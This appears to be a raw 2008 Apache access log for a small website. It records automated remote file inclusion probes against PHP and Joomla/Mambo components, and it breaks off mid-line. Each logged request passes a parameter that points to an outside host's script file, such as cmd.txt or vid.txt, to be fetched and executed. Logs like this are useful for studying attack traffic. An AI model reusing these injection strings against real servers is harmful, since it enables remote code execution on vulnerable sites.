195.39.5.203 - - [03/Aug/2008:19:04:58 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
195.39.5.203 - - [03/Aug/2008:19:05:06 -0700] "GET /logs/access_071224.log/index.php?site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.219.226.74 - - [03/Aug/2008:19:06:06 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.219.226.74 - - [03/Aug/2008:19:06:08 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.239.211.19 - - [03/Aug/2008:19:06:08 -0700] "GET /logs/access_071224.log/send_reminders.php?noSet=0&includedir=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.239.211.19 - - [03/Aug/2008:19:06:08 -0700] "GET /send_reminders.php?noSet=0&includedir=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.239.211.19 - - [03/Aug/2008:19:06:08 -0700] "GET /logs/send_reminders.php?noSet=0&includedir=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
193.239.211.19 - - [03/Aug/2008:19:06:08 -0700] "GET /logs/access_080107.log/send_reminders.php?noSet=0&includedir=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
200.219.226.74 - - [03/Aug/2008:19:06:53 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.219.226.74 - - [03/Aug/2008:19:06:55 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.200.78.44 - - [03/Aug/2008:19:07:53 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
75.125.143.162 - - [03/Aug/2008:19:08:01 -0700] "GET /logs/access_070917.log/administrator/components/com_extcalendar/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
75.125.143.162 - - [03/Aug/2008:19:08:01 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
75.125.143.162 - - [03/Aug/2008:19:08:01 -0700] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.183.105.230 - - [03/Aug/2008:19:08:06 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
216.183.105.230 - - [03/Aug/2008:19:08:06 -0700] "GET /logs/access_080127.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
216.183.105.230 - - [03/Aug/2008:19:08:07 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
216.183.105.230 - - [03/Aug/2008:19:08:08 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
216.183.105.230 - - [03/Aug/2008:19:08:09 -0700] "GET /logs/access_080127.log//Neos_Chronos/header.php?base_folder=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:19:08:09 -0700] "GET /logs/access_080204.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:19:08:10 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.183.105.230 - - [03/Aug/2008:19:08:10 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
85.214.59.54 - - [03/Aug/2008:19:08:10 -0700] "GET /logs//program/modules/mod